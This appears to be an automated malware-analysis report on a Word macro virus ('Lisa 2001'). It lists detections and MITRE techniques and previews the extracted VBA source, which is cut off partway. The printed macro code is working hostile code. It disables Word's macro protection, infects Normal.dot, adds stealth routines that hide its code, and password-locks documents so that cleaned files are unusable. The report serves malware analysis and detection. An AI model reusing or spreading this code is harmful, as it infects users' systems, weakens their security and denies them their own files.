MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to disable macro security and copy itself to the Normal.dot template, indicating a persistence mechanism. The ClamAV detections 'Doc.Trojan.Lis-2' and 'Doc.Trojan.Lily-2' further support its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Lis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Lis-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35254 bytes |
SHA-256: 83869a349b1c6846618ab25fbd10217f00c27f30fc60c0b69452f25a549a8257 |
|||
|
Detection
ClamAV:
Doc.Trojan.Lily-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'L i s a 2001
'Все пожелания (а также новые вири) слать на Slava_Atrancev@mail.ru
Dim dvl
Private Sub Document_Close()
dvl = 2
p
End Sub
Private Sub Document_New()
dvl = 3
p
End Sub
Private Sub Document_Open()
dvl = 1
p
End Sub
Private Sub p()
'___Включаем генератор случайных чисел___'
Randomize
'___Вырубаем ошибки___'
On Error Resume Next
'___Отключение защиты от вирусов для ворда 97___'
Application.Options.VirusProtection = False
'___Отключение защиты от вирусов для ворда 2000___'
System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security", "level") = 1
If ThisDocument.Name <> "Normal.dot" Then
'___Если выполняется не из нормала то ...___'
'___Вытираем нормал дот___'
a = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, a
'___Пишем в нормал дот наш код___'
a = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
b = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, a)
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines 1, b
'___Добавляем в нормал технологию стелс___'
c = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 1, "Sub viewvbcode()"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 2, "On Error Resume Next"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 3, "a = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 4, "NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, a"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 5, "NormalTemplate.Saved = True"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 6, "c = Application.Documents.Count"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 7, "For i = 1 To c"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 8, "d = Application.Documents.Item(i).VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 9, "If d > 0 Then"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 10, "Application.Documents.Item(i).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, d"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 11, "Application.Documents.Item(i).Saved = True"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 12, "End If"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 13, "Next i"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 14, "Application.ShowVisualBasicEditor = True"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 15, "End Sub"
'___Мелкая пакость антивирусникам, при закрытии паролируем документ на изменение, а при открытии снимаем пароль и после лечения, юзверь не сможет юзать этот файл___'
If dvl = 2 Then
ThisDocument.Protect Type:=wdAllowOnlyFormFields, Password:="vcdjgsqbxcly"
ThisDocument.Save
ThisDocument.Saved = True
End If
If dvl = 1 Then
ThisDocument.Unprotect Password:="vcdjgsqbxcly"
aa = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
cc = ""
For dd = 1 To 12
ee = 0
Do While ee < 97
'___Генерируем пароль случайным образом___'
ee = Int((122 * Rnd) + 1)
Loop
cc = cc + Chr(ee)
Next dd
For bb = 1 To aa
nn = NormalTemplate.VBProject.VBComponents.Item(1).Cod
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.